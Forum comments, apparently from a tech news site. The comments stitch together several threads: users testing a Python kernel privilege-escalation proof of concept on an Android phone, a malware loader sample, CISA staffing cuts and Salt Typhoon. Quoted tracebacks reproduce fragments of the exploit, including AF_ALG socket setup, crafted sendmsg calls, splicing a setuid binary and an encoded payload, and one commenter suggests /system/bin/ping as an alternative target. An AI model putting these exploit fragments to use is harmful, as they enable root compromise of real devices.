Edit: Ignore this I overlooked calling order. It is indeed blocked

~~My allegedly fully patched pixel 8 pro allowed an AF_ALG socket to open under termux without virtualization so I'm not sure the last but is true~~

I got line 5 to run and failed on line 8 due to lack of su. I'd need to find a user accessible setuid binary for it to work.

Traceback (most recent call last): File "/data/data/com.termux/files/home/exploit.py", line 8, in <module> f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3")) ^^^^^^^^^^^^^^^^^^^^^^^ FileNotFoundError: [Errno 2] No such file or directory: '/usr/bin/su'

Try /system/bin/ping

Now the socket is blocked. Also probably should have realized the socket is defined earlier than its called

Traceback (most recent call last): File "/data/data/com.termux/files/home/exploit.py", line 9, in <module> while i<len(e):c(f,i,e[i:i+4]);i+=4 ^^^^^^^^^^^^^^^ File "/data/data/com.termux/files/home/exploit.py", line 5, in c a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"4+c],[(h,3,i4),(h,2,b'\x10'+i19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o) ^^^^^^^^^^^^^^^^ File "/data/data/com.termux/files/usr/lib/python3.12/socket.py", line 233, in __init__ _socket.socket.__init__(self, family, type, proto, fileno) PermissionError: [Errno 13] Permission denied

PoC is also x86_64 only and not arm.

Its not writing to the partition though is it? It is polluting the cache page via a write with a buffer overrun in the kernel. I don't think buffer overruns follow permissions.

I assumed such memory would be mapped readonly (PROT_READ), without actually looking into it..

Has anyone posted the windows service file yet? That looks just to be the loader.

No I haven't found it yet. AFAIK MalwareBazaar (right now I cannot access the website) only has two files, one .exe and another one some 30K.

Firefox had it in 2010. I don't remember when IE ditched it.

Historically they've gotten backpay. Also they are trying to keep their jobs.

I’m not sure historical precedent tells us a whole lot and Congress has now skipped Washington. It’s hard to say when this will be resolved. It could be a month or more.

This looks like an existing pre planned product hastily rebranded AI

Last I used OSX (the version prior to the current latest IIRC) not all of the "suggestions" could be turned off

Don't worry CISA and any other involved regulator were gutted by DOGE.

Is that true or you’re just assuming it’s so?

It’s true, and briefly made the news at the time[1]. The CSRB was also decimiated, and the current DHS deputy secretary, in his confirmation hearing, called for wrecking the agency, as he disagrees with their efforts to maintain election security.

---

[1] https://techcrunch.com/2025/03/11/doge-axes-cisa-red-team-st...

I definitely remember DOGE gutting CISA. Other cuts were not always due to DOGE. A good chunk of the FBI's computer security and counter intelligence people got reassigned to immigration enforcement. The committee investigating the US cell network hacks got cut extensively but I don't remember who did it.

Regardless China was monitoring everything very easily.

https://www.pcmag.com/news/chinas-salt-typhoon-hacked-at-lea...

Ars just republished it under license